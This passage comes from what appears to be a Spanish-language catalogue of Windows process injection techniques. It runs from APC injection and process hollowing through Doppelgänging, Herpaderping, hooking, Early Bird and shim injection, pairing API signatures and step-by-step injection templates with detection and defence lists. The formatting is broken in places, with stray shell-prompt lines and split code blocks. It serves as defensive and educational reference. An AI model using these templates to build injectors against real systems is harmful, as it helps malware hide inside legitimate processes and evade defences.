4. Asignar memoria en el proceso de destino con `VirtualAllocEx`
5. Copiar los contenidos de la DLL a la memoria asignada con `WriteProcessMemory`
6. Realizar la carga manual y la reubicación de la DLL en el proceso de destino
- Analizar los encabezados PE
- Asignar memoria para cada sección
- Copiar las secciones a la memoria asignada
- Procesar la tabla de reubicación:
  - Enumerar las entradas de reubicación
  - Aplicar las reubicaciones según la nueva dirección base
- Resolver las importaciones:
  - Recorrer el directorio de importación
  - Para cada función importada, resolver su dirección usando GetProcAddress
  - Escribir las direcciones resueltas en la IAT
7. Ejecutar el punto de entrada de la DLL usando uno de los métodos de creación de subprocesos

Detección y Defensa:
- Implementar técnicas avanzadas de escaneo de memoria para detectar código inyectado
- Usar detección basada en comportamiento para identificar patrones sospechosos de asignación de memoria
- Supervisar operaciones inusuales de asignación de archivos
- Emplear métodos de detección basados en heurísticas para identificar cargadores reflectivos
## 4. Inyección APC

Esta técnica permite la ejecución de código en un subproceso específico adjuntándose a una cola de llamadas a procedimiento asincrónico (APC).  Funciona mejor con subprocesos alertables (aquellos que llaman a funciones de espera alertables).

APIs clave:
- [`CreateToolhelp32Snapshot`](https://docs.microsoft.com/en-us/windows/win32/api/tlhelp32/nf-tlhelp32-createtoolhelp32snapshot)  ```c
HANDLE CreateToolhelp32Snapshot(
  DWORD dwFlags,
  DWORD th32ProcessID
);
  • Process32First ```c BOOL Process32First( HANDLE hSnapshot, LPPROCESSENTRY32 lppe );
    root@kitploit:~
  • Process32Next ```c BOOL Process32Next( HANDLE hSnapshot, LPPROCESSENTRY32 lppe );
    root@kitploit:~
  • Thread32First ```c BOOL Thread32First( HANDLE hSnapshot, LPTHREADENTRY32 lpte );
    root@kitploit:~
  • Thread32Next ```c BOOL Thread32Next( HANDLE hSnapshot, LPTHREADENTRY32 lpte );
    root@kitploit:~
  • QueueUserAPC ```c DWORD QueueUserAPC( PAPCFUNC pfnAPC, HANDLE hThread, ULONG_PTR dwData );
    root@kitploit:~

Plantilla:

  1. Cree una instantánea de los procesos del sistema con CreateToolhelp32Snapshot
  2. Enumere los procesos y subprocesos usando Process32First, Process32Next, Thread32First y Thread32Next
  3. Abra el proceso objetivo con OpenProcess
  4. Asigne memoria en el proceso objetivo con VirtualAllocEx
  5. Escriba el código malicioso en la memoria asignada con WriteProcessMemory
  6. Ponga en cola un APC al subproceso objetivo con QueueUserAPC, apuntando al código inyectado

Detección y Defensa:

  • Supervise operaciones sospechosas de cola de APC
  • Implemente la supervisión de la ejecución de subprocesos para detectar ejecuciones de código inesperadas
  • Use soluciones EDR con capacidades para detectar el abuso de APC
  • Emplee el análisis en tiempo de ejecución para identificar comportamientos de subprocesos inusuales

5. Process Hollowing (Reemplazo de Proceso)

Esta técnica "drena" todo el contenido de un proceso e inserta contenido malicioso en él.

APIs clave:

  • CreateProcess ```c BOOL CreateProcessA( LPCSTR lpApplicationName, LPSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes, LPSECURITY_ATTRIBUTES lpThreadAttributes, BOOL bInheritHandles, DWORD dwCreationFlags, LPVOID lpEnvironment, LPCSTR lpCurrentDirectory, LPSTARTUPINFOA lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation );
    root@kitploit:~
  • NtQueryInformationProcess (No documentado) ```c NTSTATUS NTAPI NtQueryInformationProcess( IN HANDLE ProcessHandle, IN PROCESSINFOCLASS ProcessInformationClass, OUT PVOID ProcessInformation, IN ULONG ProcessInformationLength, OUT PULONG ReturnLength OPTIONAL );
    root@kitploit:~
  • GetModuleHandle ```c HMODULE GetModuleHandleA( LPCSTR lpModuleName );
    root@kitploit:~
  • ZwUnmapViewOfSection / NtUnmapViewOfSection (No documentado) ```c NTSTATUS NTAPI NtUnmapViewOfSection( IN HANDLE ProcessHandle, IN PVOID BaseAddress );
    root@kitploit:~
  • VirtualAllocEx (ver arriba)

Plantilla:

  1. Crear un nuevo proceso en estado suspendido usando CreateProcess con el indicador CREATE_SUSPENDED
  2. Obtener la información del proceso usando NtQueryInformationProcess
  3. Desasignar el ejecutable original del proceso usando NtUnmapViewOfSection. Después de desasignar el ejecutable original, ajustar la dirección base de la imagen en el PEB (Bloque de Entorno de Proceso) para que apunte a la nueva memoria asignada.
  4. Ajustar la dirección base de la imagen en el PEB:
  • Usar ReadProcessMemory para leer el PEB
  • Localizar el campo ImageBaseAddress
  • Usar WriteProcessMemory para actualizarlo con la dirección de la memoria recién asignada
  1. Asignar memoria en el proceso de destino con VirtualAllocEx
  2. Escribir el ejecutable malicioso en la memoria asignada con WriteProcessMemory
  3. Actualizar el contexto del subproceso para que apunte al nuevo punto de entrada usando GetThreadContext y SetThreadContext
  4. Reanudar el subproceso principal del proceso con ResumeThread

Detección y Defensa:

  • Implementar comprobaciones de integridad de procesos para detectar procesos vaciados
  • Supervisar patrones sospechosos de creación de procesos, especialmente con el indicador CREATE_SUSPENDED
  • Usar herramientas de análisis forense de memoria para identificar signos de vaciado de procesos
  • Emplear detección basada en comportamiento para identificar procesos con diseños de memoria inesperados

6. AtomBombing

Una variante de la inyección APC que funciona dividiendo la carga útil maliciosa en cadenas separadas y usando átomos. Esta técnica se basa en el hecho de que los átomos se comparten entre procesos.

APIs clave:

  • OpenThread (ver arriba)
  • GlobalAddAtom ```c ATOM GlobalAddAtomA( LPCSTR lpString );
    root@kitploit:~

GlobalGetAtomName ```c UINT GlobalGetAtomNameA( ATOM nAtom, LPSTR lpBuffer, int nSize );

root@kitploit:~
- `QueueUserAPC` (ver arriba)
- `NtQueueApcThread` (No documentado, ver arriba)
- `NtSetContextThread` (No documentado)  ```c
NTSTATUS NTAPI NtSetContextThread(
  IN HANDLE ThreadHandle,
  IN PCONTEXT ThreadContext
);

Template:

  1. Dividir la carga útil maliciosa en pequeños fragmentos
  2. Para cada fragmento, usar GlobalAddAtom para crear un átomo global
  3. Abrir el hilo objetivo con OpenThread
  4. Poner en cola un APC al hilo objetivo con QueueUserAPC o NtQueueApcThread
  5. En la rutina APC, usar GlobalGetAtomName para recuperar los fragmentos de la carga útil
  6. Ensamblar la carga útil en la memoria del proceso objetivo
  7. Ejecutar la carga útil usando NtSetContextThread o poniendo en cola otro APC

Detección y defensa:

  • Supervisar patrones inusuales de creación y recuperación de átomos
  • Implementar detección basada en comportamiento para procesos que acceden a un gran número de átomos
  • Usar soluciones EDR con capacidades para detectar técnicas de AtomBombing
  • Emplear análisis en tiempo de ejecución para identificar uso sospechoso de APC en combinación con manipulación de átomos

7. Process Doppelgänging

Una evolución del Process Hollowing que reemplaza la imagen antes de que se cree el proceso. Esta técnica aprovecha el Windows Transactional NTFS (TxF) para reemplazar temporalmente un archivo legítimo por uno malicioso durante la creación del proceso.

APIs clave:

  • CreateTransaction ```c HANDLE CreateTransaction( LPSECURITY_ATTRIBUTES lpTransactionAttributes, LPGUID UOW, DWORD CreateOptions, DWORD IsolationLevel, DWORD IsolationFlags, DWORD Timeout, LPWSTR Description );
    root@kitploit:~
  • CreateFileTransacted ```c HANDLE CreateFileTransactedA( LPCSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile, HANDLE hTransaction, PUSHORT pusMiniVersion, PVOID lpExtendedParameter );
    root@kitploit:~

NtCreateSection (Sin documentar) ```c NTSTATUS NTAPI NtCreateSection( OUT PHANDLE SectionHandle, IN ACCESS_MASK DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, IN PLARGE_INTEGER MaximumSize OPTIONAL, IN ULONG SectionPageProtection, IN ULONG AllocationAttributes, IN HANDLE FileHandle OPTIONAL );

root@kitploit:~
- `NtCreateProcessEx` (No documentado)  ```c
NTSTATUS NTAPI NtCreateProcessEx(
  OUT PHANDLE ProcessHandle,
  IN ACCESS_MASK DesiredAccess,
  IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
  IN HANDLE ParentProcess,
  IN ULONG Flags,
  IN HANDLE SectionHandle OPTIONAL,
  IN HANDLE DebugPort OPTIONAL,
  IN HANDLE ExceptionPort OPTIONAL,
  IN BOOLEAN InJob
);
  • NtQueryInformationProcess (No documentado, ver arriba)
  • NtCreateThreadEx (No documentado) ```c NTSTATUS NTAPI NtCreateThreadEx( OUT PHANDLE ThreadHandle, IN ACCESS_MASK DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, IN HANDLE ProcessHandle, IN PVOID StartRoutine, IN PVOID Argument OPTIONAL, IN ULONG CreateFlags, IN SIZE_T ZeroBits, IN SIZE_T StackSize, IN SIZE_T MaximumStackSize, IN PPS_ATTRIBUTE_LIST AttributeList OPTIONAL );
    root@kitploit:~
  • RollbackTransaction ```c BOOL RollbackTransaction( HANDLE TransactionHandle );
    root@kitploit:~

Plantilla:

  1. Crear una transacción usando CreateTransaction
  2. Crear un archivo transaccionado con CreateFileTransacted
  3. Escribir la carga útil maliciosa en el archivo transaccionado
  4. Crear una sección para el archivo transaccionado usando NtCreateSection
  5. Crear un proceso a partir de la sección usando NtCreateProcessEx
  6. Crear un hilo en el nuevo proceso con NtCreateThreadEx
  7. Revertir la transacción con RollbackTransaction para eliminar rastros del archivo malicioso

Detección y defensa:

  • Monitorear operaciones transaccionales sospechosas de NTFS
  • Implementar monitoreo de integridad de archivos para detectar reemplazos temporales de archivos
  • Usar soluciones EDR avanzadas capaces de detectar técnicas de Process Doppelgänging
  • Emplear detección basada en comportamiento para identificar procesos creados a partir de archivos transaccionados

8. Process Herpaderping

Similar a Process Doppelgänging, pero explota el orden de creación del proceso y las comprobaciones de seguridad. Esta técnica explota el hecho de que Windows realiza comprobaciones de seguridad sobre el archivo ejecutable antes de comenzar a ejecutar el proceso.

APIs clave:

  • CreateFile ```c HANDLE CreateFileA( LPCSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile );
    root@kitploit:~
  • NtCreateSection (No documentado, ver arriba)
  • NtCreateProcessEx (No documentado, ver arriba)
  • NtCreateThreadEx (No documentado, ver arriba)

Plantilla:

  1. Crear un archivo con CreateFile
  2. Escribir la carga útil maliciosa en el archivo
  3. Crear una sección para el archivo mediante NtCreateSection
  4. Sobrescribir el contenido del archivo con datos benignos
  5. Crear un proceso a partir de la sección mediante NtCreateProcessEx
  6. Crear un hilo en el nuevo proceso con NtCreateThreadEx

Detección y Defensa:

  • Implementar monitoreo de integridad de archivos para detectar cambios rápidos en archivos ejecutables
  • Usar detección basada en comportamiento para identificar procesos con contenido de archivo no coincidente
  • Emplear soluciones EDR avanzadas capaces de detectar técnicas de Process Herpaderping
  • Monitorear patrones sospechosos de creación, modificación de archivos y creación de procesos

9. Inyección mediante Hooking

Esta técnica utiliza funciones relacionadas con el hooking para inyectar una DLL maliciosa. Esta técnica también se puede utilizar para el hooking de API, no solo para la inyección.

APIs clave:

  • SetWindowsHookEx ```c HHOOK SetWindowsHookExA( int idHook, HOOKPROC lpfn, HINSTANCE hmod, DWORD dwThreadId );
    root@kitploit:~
  • PostThreadMessage ```c BOOL PostThreadMessageA( DWORD idThread, UINT Msg, WPARAM wParam, LPARAM lParam );
    root@kitploit:~

Plantilla:

  1. Crear una DLL que contenga el procedimiento de hook
  2. Usar SetWindowsHookEx para establecer un hook en el proceso objetivo
  3. Activar el hook enviando un mensaje con PostThreadMessage

Detección y defensa:

  • Supervisar el uso sospechoso de SetWindowsHookEx, especialmente con hooks globales
  • Implementar mecanismos de detección de API hooking
  • Usar soluciones EDR con capacidades para detectar instalaciones anómalas de hooks
  • Emplear detección basada en comportamiento para identificar procesos con módulos cargados inesperados

10. Inyección de Memoria Extra de Windows

Esta técnica inyecta código en un proceso mediante la Memoria Extra de Windows (EWM), que se anexa a la instancia de una clase durante el registro de la clase de ventana. Es menos común y podría ser detectada por algunas soluciones de seguridad.

APIs clave:

  • FindWindowA ```c HWND FindWindowA( LPCSTR lpClassName, LPCSTR lpWindowName );
    root@kitploit:~
  • GetWindowThreadProcessId ```c DWORD GetWindowThreadProcessId( HWND hWnd, LPDWORD lpdwProcessId );
    root@kitploit:~
  • OpenProcess (ver arriba)
  • VirtualAllocEx (ver arriba)
  • WriteProcessMemory (ver arriba)
  • SetWindowLongPtrA ```c LONG_PTR SetWindowLongPtrA( HWND hWnd, int nIndex, LONG_PTR dwNewLong );
    root@kitploit:~
  • SendNotifyMessage ```c BOOL SendNotifyMessageA( HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam );
    root@kitploit:~

Plantilla:

  1. Encuentra la ventana objetivo con FindWindowA
  2. Obtén el ID de proceso de la ventana con GetWindowThreadProcessId
  3. Abre el proceso con OpenProcess
  4. Asigna memoria en el proceso objetivo con VirtualAllocEx
  5. Escribe el código malicioso en la memoria asignada con WriteProcessMemory
  6. Usa SetWindowLongPtrA para modificar la memoria adicional de la ventana
  7. Activa la ejecución con SendNotifyMessage

Detección y defensa:

  • Supervisa modificaciones sospechosas en las propiedades de las ventanas
  • Implementa comprobaciones de integridad para los datos de las clases de ventana
  • Usa soluciones EDR con capacidades para detectar la manipulación de EWM
  • Emplea detección basada en comportamiento para identificar procesos con cambios inesperados en las propiedades de las ventanas

11. Inyección por propagación

Esta técnica se utiliza para inyectar código malicioso en procesos con nivel de integridad medio, como explorer.exe. Funciona enumerando ventanas y subclasificándolas. Puede ser especialmente eficaz para la escalada de privilegios.

APIs clave:

  • EnumWindows ```c BOOL EnumWindows( WNDENUMPROC lpEnumFunc, LPARAM lParam );
    root@kitploit:~

EnumChildWindows ```c BOOL EnumChildWindows( HWND hWndParent, WNDENUMPROC lpEnumFunc, LPARAM lParam );

root@kitploit:~
- [`EnumProps`](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-enumpropa)  ```c
int EnumPropsA(
  HWND      hWnd,
  PROPENUMPROCA lpEnumFunc
);
  • GetProp ```c HANDLE GetPropA( HWND hWnd, LPCSTR lpString );
    root@kitploit:~
  • SetWindowSubclass ```c BOOL SetWindowSubclass( HWND hWnd, SUBCLASSPROC pfnSubclass, UINT_PTR uIdSubclass, DWORD_PTR dwRefData );
    root@kitploit:~
  • FindWindow (véase arriba)
  • FindWindowEx (véase arriba)
  • GetWindowThreadProcessId (véase arriba)
  • OpenProcess (véase arriba)
  • ReadProcessMemory (véase arriba)
  • VirtualAllocEx (véase arriba)
  • WriteProcessMemory (véase arriba)
  • ```c BOOL SetPropA( HWND hWnd, LPCSTR lpString, HANDLE hData );
  1. Enumerar ventanas usando EnumWindows y EnumChildWindows
  2. Para cada ventana, comprobar si hay ventanas subclasificadas usando EnumProps y GetProp
  3. Abrir el proceso objetivo con OpenProcess
  4. Asignar memoria en el proceso objetivo con VirtualAllocEx
  5. Escribir el código malicioso en la memoria asignada con WriteProcessMemory
  6. Subclasificar la ventana usando SetWindowSubclass
  7. Establecer una nueva propiedad con SetPropA para almacenar la carga útil
  8. Desencadenar la ejecución enviando un mensaje con PostMessage

Detección y Defensa:

  • Monitorear patrones sospechosos de enumeración y subclasificación de ventanas
  • Implementar comprobaciones de integridad para la subclasificación de ventanas
  • Usar soluciones EDR con capacidades para detectar técnicas de inyección de propagación
  • Emplear detección basada en comportamiento para identificar procesos con cambios inesperados en la subclasificación de ventanas

12. Heap Spray

Aunque no es estrictamente una técnica de inyección, el heap spraying se utiliza a menudo junto con otros métodos de inyección para facilitar la entrega de cargas útiles de exploits. Los navegadores modernos y los sistemas operativos han implementado mitigaciones contra esto.

APIs clave:

  • HeapAlloc ```c LPVOID HeapAlloc( HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes );
    root@kitploit:~
  • VirtualAlloc ```c LPVOID VirtualAlloc( LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect );
    root@kitploit:~

Template:

  1. Asignar múltiples bloques de memoria usando HeapAlloc o VirtualAlloc
  2. Rellenar estos bloques con una combinación de NOP sleds y el payload
  3. Repetir este proceso para cubrir una gran parte del espacio de direcciones del proceso

Detección y Defensa:

  • Implementar monitorización de asignación de memoria para detectar patrones sospechosos
  • Usar la aleatorización del diseño del espacio de direcciones (ASLR) para mitigar los ataques de heap spraying
  • Emplear soluciones EDR con capacidades para detectar técnicas de heap spraying
  • Implementar mitigaciones específicas del navegador, como aleatorizar la asignación del heap

13. Secuestro de Ejecución de Hilos

Esta técnica consiste en suspender un hilo legítimo en un proceso objetivo, modificar su contexto de ejecución para que apunte a código malicioso y luego reanudar el hilo. Guardar y restaurar el contexto original del hilo es necesario para mantener la estabilidad del proceso.

APIs clave:

  • OpenThread (ver arriba)
  • SuspendThread (ver arriba)
  • GetThreadContext (ver arriba)
  • SetThreadContext (ver arriba)
  • VirtualAllocEx (ver arriba)
  • WriteProcessMemory (ver arriba)
  • ResumeThread (ver arriba)

Template:

  1. Abrir el hilo objetivo con OpenThread
  2. Suspender el hilo con SuspendThread
  3. Obtener el contexto del hilo con GetThreadContext
  4. Asignar memoria en el proceso objetivo con VirtualAllocEx
  5. Escribir el código malicioso en la memoria asignada con WriteProcessMemory
  6. Modificar el contexto del hilo para que apunte al código inyectado con SetThreadContext
  7. Reanudar el hilo con ResumeThread

Detección y Defensa:

  • Supervisar patrones sospechosos de suspensión y reanudación de hilos
  • Implementar monitorización de la ejecución de hilos para detectar cambios inesperados en el flujo de ejecución
  • Usar soluciones EDR con capacidades para detectar técnicas de secuestro de hilos
  • Emplear análisis en tiempo de ejecución para identificar comportamiento inusual de los hilos

14. Module Stomping

Esta técnica sobrescribe la memoria de un módulo legítimo en el proceso objetivo con código malicioso, lo que potencialmente puede eludir algunas comprobaciones de seguridad. Puede ser detectada mediante comprobaciones de integridad en los módulos cargados.

APIs clave:

  • GetModuleInformation ```c BOOL GetModuleInformation( HANDLE hProcess, HMODULE hModule, LPMODULEINFO lpmodinfo, DWORD cb );
    root@kitploit:~
  • VirtualProtectEx ```c BOOL VirtualProtectEx( HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect, PDWORD lpflOldProtect );
    root@kitploit:~
  • WriteProcessMemory (ver arriba)

Plantilla:

  1. Abrir el proceso objetivo con OpenProcess
  2. Obtener información sobre el módulo objetivo usando GetModuleInformation
  3. Cambiar la protección de memoria del módulo a escribible usando VirtualProtectEx
  4. Sobrescribir la sección de código del módulo con código malicioso usando WriteProcessMemory
  5. Restaurar la protección de memoria original con VirtualProtectEx

Detección y Defensa:

  • Implementar comprobaciones de integridad de módulos para detectar modificaciones en los módulos cargados
  • Usar soluciones EDR con capacidades para detectar técnicas de module stomping
  • Emplear herramientas de análisis forense de memoria para identificar signos de module stomping
  • Implementar mecanismos de firma de código y verificación para los módulos cargados

15. Hooking de IAT

Esta técnica modifica la Tabla de Direcciones de Importación (IAT) de un proceso para redirigir llamadas a funciones hacia código malicioso. Se detecta comparando las entradas de la IAT con las direcciones reales de las funciones en las DLL objetivo.

APIs clave:

  • GetProcAddress ```c FARPROC GetProcAddress( HMODULE hModule, LPCSTR lpProcName );
    root@kitploit:~
  • VirtualProtect ```c BOOL VirtualProtect( LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect, PDWORD lpflOldProtect );
    root@kitploit:~

Plantilla:

  1. Localizar la IAT del proceso objetivo
  2. Identificar la función que se va a enganchar
  3. Cambiar la protección de memoria de la IAT a escritura usando VirtualProtect
  4. Reemplazar la dirección de la función original por la dirección de la función maliciosa
  • Calcular la dirección de la entrada de la IAT para la función objetivo
  • Leer la dirección de la función original desde la entrada de la IAT
  • Reemplazar la dirección de la función original por la dirección de la función maliciosa
  1. Restaurar la protección de memoria original

Detección y defensa:

  • Implementar comprobaciones de integridad de la IAT para detectar modificaciones
  • Usar soluciones EDR con capacidades para detectar el enganchado de IAT
  • Emplear análisis en tiempo de ejecución para identificar redirecciones inesperadas de funciones
  • Implementar mecanismos de firma de código y verificación para los módulos cargados

16. Hookeo Inline

Esta técnica modifica las primeras instrucciones de una función para redirigir la ejecución a código malicioso. requiere un manejo cuidadoso de las instrucciones multibyte y los saltos relativos.

APIs clave:

  • VirtualProtect (ver arriba)
  • memcpy ```c void *memcpy( void *dest, const void *src, size_t count );
    root@kitploit:~

Template:

  1. Localizar la función objetivo en memoria
  2. Cambiar la protección de memoria a escribible usando VirtualProtect
  3. Guardar las instrucciones originales (generalmente 5 o más bytes)
  4. Sobrescribir el inicio de la función con un salto al código malicioso
  5. En el código malicioso, ejecutar las instrucciones originales guardadas y luego saltar de vuelta a la función original

Detección y Defensa:

  • Implementar comprobaciones de integridad de funciones para detectar modificaciones en los prólogos de las funciones
  • Usar soluciones EDR con capacidades para detectar hooks inline
  • Emplear análisis en tiempo de ejecución para identificar cambios inesperados en el flujo de ejecución de las funciones
  • Implementar mecanismos de firma de código y verificación para los módulos cargados

17. Inyección mediante Depurador

Esta técnica utiliza APIs de depuración para inyectar código en un proceso objetivo. Puede ser detectada mediante comprobaciones anti-debugging en el proceso objetivo.

APIs clave:

  • DebugActiveProcess ```c BOOL DebugActiveProcess( DWORD dwProcessId );
    root@kitploit:~
  • WaitForDebugEvent ```c BOOL WaitForDebugEvent( LPDEBUG_EVENT lpDebugEvent, DWORD dwMilliseconds );
    root@kitploit:~

ContinueDebugEvent ```c BOOL ContinueDebugEvent( DWORD dwProcessId, DWORD dwThreadId, DWORD dwContinueStatus );

root@kitploit:~
Template:
1. Adjuntarse al proceso objetivo como depurador usando `DebugActiveProcess`
2. Esperar eventos de depuración con `WaitForDebugEvent`
3. Cuando ocurra un evento adecuado, inyectar el código malicioso usando `WriteProcessMemory`
4. Modificar el contexto del hilo para ejecutar el código inyectado
5. Continuar el evento de depuración con `ContinueDebugEvent`

Detección y Defensa:
- Implementar técnicas anti-depuración en aplicaciones sensibles
- Monitorear el uso sospechoso de APIs de depuración
- Usar soluciones EDR con capacidades para detectar inyección basada en depuradores
- Emplear análisis en tiempo de ejecución para identificar eventos de depuración inesperados

## 18. Secuestro de COM

Esta técnica consiste en reemplazar objetos COM legítimos por otros maliciosos para ejecutar código cuando el objeto COM se instancia. Se utiliza para persistencia, no solo para inyección.

APIs clave:
- [`CoCreateInstance`](https://docs.microsoft.com/en-us/windows/win32/api/combaseapi/nf-combaseapi-cocreateinstance)  ```c
HRESULT CoCreateInstance(
  REFCLSID rclsid,
  LPUNKNOWN pUnkOuter,
  DWORD dwClsContext,
  REFIID riid,
  LPVOID *ppv
);

RegOverridePredefKey ```c LSTATUS RegOverridePredefKey( HKEY hKey, HKEY hNewHKey );

root@kitploit:~
Plantilla:
1. Crear un objeto COM malicioso
2. Modificar el registro para reemplazar el CLSID de un objeto COM legítimo por el malicioso
3. Cuando la aplicación llama a `CoCreateInstance`, el objeto malicioso se instanciará en su lugar

Detección y defensa:
- Implementar comprobaciones de integridad de objetos COM
- Supervisar modificaciones sospechosas del registro relacionadas con objetos COM
- Usar listas blancas de aplicaciones para evitar que se carguen objetos COM no autorizados
- Emplear detección basada en comportamiento para identificar instanciaciones inesperadas de objetos COM

## 19. Phantom DLL Hollowing

Esta técnica consiste en crear una nueva sección en una DLL legítima e inyectar código en ella.

APIs clave:
- [`LoadLibraryEx`](https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibraryexa)  ```c
HMODULE LoadLibraryExA(
  LPCSTR lpLibFileName,
  HANDLE hFile,
  DWORD  dwFlags
);
  • VirtualAlloc ```c LPVOID VirtualAlloc( LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect );
    root@kitploit:~
  • VirtualProtect ```c BOOL VirtualProtect( LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect, PDWORD lpflOldProtect );
    root@kitploit:~

Plantilla:

  1. Cargar una DLL legítima usando LoadLibraryEx con la bandera DONT_RESOLVE_DLL_REFERENCES
  2. Asignar una nueva sección de memoria usando VirtualAlloc
  3. Copiar el código malicioso a la nueva sección
  4. Modificar los encabezados PE de la DLL para incluir la nueva sección
  5. Cambiar la protección de memoria de la nueva sección usando VirtualProtect
  6. Ejecutar el código inyectado

Detección y Defensa:

  • Implementar comprobaciones de integridad de DLL para detectar modificaciones
  • Supervisar patrones sospechosos de carga de DLL y asignación de memoria
  • Usar soluciones EDR con capacidades para detectar el hollowing de DLL fantasma
  • Emplear herramientas de forensia de memoria para identificar signos de manipulación de DLL

20. PROPagate

Esta técnica abusa de las funciones SetProp/GetProp de la API de Windows para lograr la ejecución de código.

APIs clave:

  • SetProp ```c BOOL SetPropA( HWND hWnd, LPCSTR lpString, HANDLE hData );
    root@kitploit:~
  • GetProp ```c HANDLE GetPropA( HWND hWnd, LPCSTR lpString );
    root@kitploit:~
  • EnumPropsEx ```c int EnumPropsExW( HWND hWnd, PROPENUMPROCEXW lpEnumFunc, LPARAM lParam );
    root@kitploit:~

Template:

  1. Busque una ventana objetivo utilizando FindWindow o EnumWindows
  2. Asigne memoria para el payload utilizando VirtualAllocEx
  3. Escriba el payload en la memoria asignada utilizando WriteProcessMemory
  4. Use SetProp para establecer una propiedad en la ventana, con la dirección del payload como valor de la propiedad
  • Cree un procedimiento de ventana personalizado que ejecute el payload
  • Use SetWindowLongPtr para reemplazar el procedimiento de ventana original por el personalizado
  1. Active la ejecución haciendo que la ventana enumere sus propiedades (por ejemplo, enviando un mensaje que provoque un redibujado)

Detección y Defensa:

  • Supervise modificaciones sospechosas en las propiedades de las ventanas
  • Implemente comprobaciones de integridad para las propiedades de las ventanas
  • Utilice soluciones EDR con capacidades para detectar técnicas PROPagate
  • Emplee detección basada en comportamiento para identificar procesos con cambios inesperados en las propiedades de las ventanas

21. Inyección Early Bird

Esta técnica inyecta código en un proceso durante su inicialización, antes de que el hilo principal comience a ejecutarse.

APIs clave:

  • CreateProcess ```c BOOL CreateProcessA( LPCSTR lpApplicationName, LPSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes, LPSECURITY_ATTRIBUTES lpThreadAttributes, BOOL bInheritHandles, DWORD dwCreationFlags, LPVOID lpEnvironment, LPCSTR lpCurrentDirectory, LPSTARTUPINFOA lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation );
    root@kitploit:~
  • VirtualAllocEx (ver arriba)
  • WriteProcessMemory (ver arriba)
  • QueueUserAPC (ver arriba)
  • ResumeThread (ver arriba)

Plantilla:

  1. Crear un nuevo proceso en estado suspendido usando CreateProcess con la bandera CREATE_SUSPENDED
  2. Asignar memoria en el nuevo proceso usando VirtualAllocEx
  3. Escribir el payload en la memoria asignada usando WriteProcessMemory
  4. Poner en cola un APC al hilo principal usando QueueUserAPC, apuntando al payload
  5. Reanudar el hilo principal usando ResumeThread

Detección y defensa:

  • Monitorear la creación de procesos con la bandera CREATE_SUSPENDED
  • Implementar monitoreo de inicialización de procesos para detectar ejecución de código inesperada
  • Usar soluciones EDR con capacidades para detectar técnicas de inyección Early Bird
  • Emplear detección basada en comportamiento para identificar procesos con patrones de inicialización anormales

22. Inyección basada en Shim

Esta técnica aprovecha el marco de compatibilidad de aplicaciones de Windows para inyectar código.

APIs clave:

  • SdbCreateDatabase ```c PDB SdbCreateDatabase( LPCWSTR pwszPath );
    root@kitploit:~
  • SdbWriteDWORDTag ```c BOOL SdbWriteDWORDTag( PDB pdb, TAG tTag, DWORD dwData );
    root@kitploit:~
  • SdbEndWriteListTag ```c BOOL SdbEndWriteListTag( PDB pdb, TAG tTag );
    root@kitploit:~

Plantilla:

  1. Crea una base de datos de shim usando SdbCreateDatabase
  2. Escribe los datos del shim en la base de datos, incluidos el payload y la aplicación de destino
  3. Instala la base de datos de shim usando sdbinst.exe
  4. El payload se ejecutará cuando se lance la aplicación de destino

Detección y defensa:

  • Supervisa la creación e instalación sospechosa de bases de datos de shim
  • Implementa supervisión de shims de compatibilidad de aplicaciones
  • Usa soluciones EDR con capacidades para detectar técnicas de inyección basadas en shims
  • Emplea listas blancas para shims aprobados y bloquea instalaciones de shims no autorizadas

23. Inyección mediante mapeo

Esta técnica utiliza archivos mapeados en memoria para inyectar código en un proceso remoto.

APIs clave:

  • CreateFileMapping ```c HANDLE CreateFileMappingA( HANDLE hFile, LPSECURITY_ATTRIBUTES lpFileMappingAttributes, DWORD flProtect, DWORD dwMaximumSizeHigh, DWORD dwMaximumSizeLow, LPCSTR lpName );
    root@kitploit:~
  • MapViewOfFile ```c LPVOID MapViewOfFile( HANDLE hFileMappingObject, DWORD dwDesiredAccess, DWORD dwFileOffsetHigh, DWORD dwFileOffsetLow, SIZE_T dwNumberOfBytesToMap );
    root@kitploit:~

NtMapViewOfSection (Sin documentar) ```c NTSTATUS NTAPI NtMapViewOfSection( HANDLE SectionHandle, HANDLE ProcessHandle, PVOID *BaseAddress, ULONG_PTR ZeroBits, SIZE_T CommitSize, PLARGE_INTEGER SectionOffset, PSIZE_T ViewSize, SECTION_INHERIT InheritDisposition, ULONG AllocationType, ULONG Win32Protect );

root@kitploit:~
Template:
1. Cree un objeto de asignación de archivos mediante `CreateFileMapping`
2. Asigne una vista del archivo en el proceso actual mediante `MapViewOfFile`
3. Escriba el payload en la vista asignada
4. Use `NtMapViewOfSection` para asignar la vista en el proceso de destino
5. Ejecute el payload en el proceso de destino

Detección y Defensa:
- Supervise los patrones sospechosos de asignación de archivos y creación de vistas
- Implemente la supervisión del mapeo de memoria para detectar el uso inesperado de memoria compartida
- Use soluciones EDR con capacidades para detectar técnicas de inyección mediante mapeo
- Emplee la detección basada en comportamiento para identificar procesos con uso anómalo de archivos asignados en memoria

## 24. Envenenamiento de la caché KnownDlls

Esta técnica consiste en reemplazar una DLL legítima en la caché KnownDlls por una maliciosa.

